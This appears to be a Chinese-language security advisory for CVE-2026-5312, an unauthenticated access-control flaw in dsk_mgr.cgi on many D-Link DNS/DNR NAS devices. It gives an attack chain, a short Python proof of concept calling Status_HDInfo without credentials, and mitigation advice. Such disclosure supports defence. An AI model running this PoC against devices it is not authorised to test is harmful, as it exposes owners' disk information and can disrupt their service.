CVE-2026-5312 多款D-Link设备访问控制不当漏洞

漏洞信息

漏洞编号

CVE-2026-5312

漏洞类型

访问控制不当

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05, DNS-1550-04

漏洞概述

D-Link多款NAS和录像机设备（DNS/DNR系列）存在访问控制不当漏洞。该漏洞源于`/cgi-bin/dsk_mgr.cgi`文件中的多个函数未正确实施访问权限验证。攻击者无需用户交互或身份认证，即可通过网络远程向受影响设备发送特制请求。成功利用此漏洞可能导致敏感信息泄露或服务可用性降低，对设备安全性构成威胁。

技术细节

该漏洞位于D-Link设备的Web管理接口CGI脚本`/cgi-bin/dsk_mgr.cgi`中。受影响的函数包括`FMT_restart`、`Status_HDInfo`、`SMART_List`等多个与磁盘管理和状态查询相关的接口。由于这些函数在处理HTTP请求时未对调用者身份进行严格的权限校验（即未检查Session或Token），导致攻击者可以直接构造HTTP请求调用这些敏感接口。攻击者利用CVSS向量`AV:N/AC:L/PR:N/UI:N`，可以在无需任何认证的情况下远程触发漏洞。虽然描述中提到完整性影响为无，但机密性和可用性受到低程度影响，这意味着攻击者可能读取敏感的磁盘状态信息或触发某些导致服务不稳定的操作。由于利用代码已公开，该漏洞的攻击门槛极低。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别出暴露在互联网或内网中的D-Link DNS/DNR系列设备，并确认其Web管理端口（通常为80/443）开放。

STEP 2

2. 发起攻击

攻击者构造特定的HTTP请求，直接访问`/cgi-bin/dsk_mgr.cgi`接口，并代入受影响的函数参数（如`cmd=Status_HDInfo`），无需经过身份认证。

STEP 3

3. 漏洞利用

由于系统未校验用户权限，CGI脚本执行了请求的操作。攻击者可能获取硬盘信息、SMART数据，或触发重启等操作。

STEP 4

4. 影响达成

攻击者成功获取了设备的敏感状态信息（机密性影响），或者通过频繁请求导致服务不稳定（可用性影响）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
import requests

# PoC for CVE-2026-5312
# Target: D-Link DNS/DNR Series
# Description: Unauthenticated access to dsk_mgr.cgi functions

target_ip = "192.168.1.1"  # Replace with target IP
base_url = f"http://{target_ip}/cgi-bin/dsk_mgr.cgi"

# Vulnerable functions mentioned: FMT_restart, Status_HDInfo, SMART_List
params = {
    "cmd": "Status_HDInfo"
}

try:
    print(f"[*] Sending request to {base_url}...")
    response = requests.get(base_url, params=params, timeout=10)
    
    if response.status_code == 200:
        print("[+] Request successful. Response received:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

D-Link DNS/DNR系列 <= 20260205

防御指南

临时缓解措施

建议立即检查设备版本，如果固件日期早于2026年2月5日，应限制对设备Web管理接口的网络访问。在未获得官方补丁前，可通过ACL（访问控制列表）仅允许可信IP地址访问设备的80/443端口，以降低被远程攻击的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5312
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5312
3 Details https://www.cvedetails.com/cve/CVE-2026-5312/
4 VulDB https://vuldb.com/cve/CVE-2026-5312
5 Link https://github.com/wudipjq/my_vuln/blob/main/D-Link8/vuln_172/172.md
6 Link https://github.com/wudipjq/my_vuln/blob/main/D-Link8/vuln_173/173.md
7 Link https://vuldb.com/submit/780442
8 Link https://vuldb.com/submit/780443
9 Link https://vuldb.com/vuln/354641
10 Link https://vuldb.com/vuln/354641/cti
11 Link https://www.dlink.com/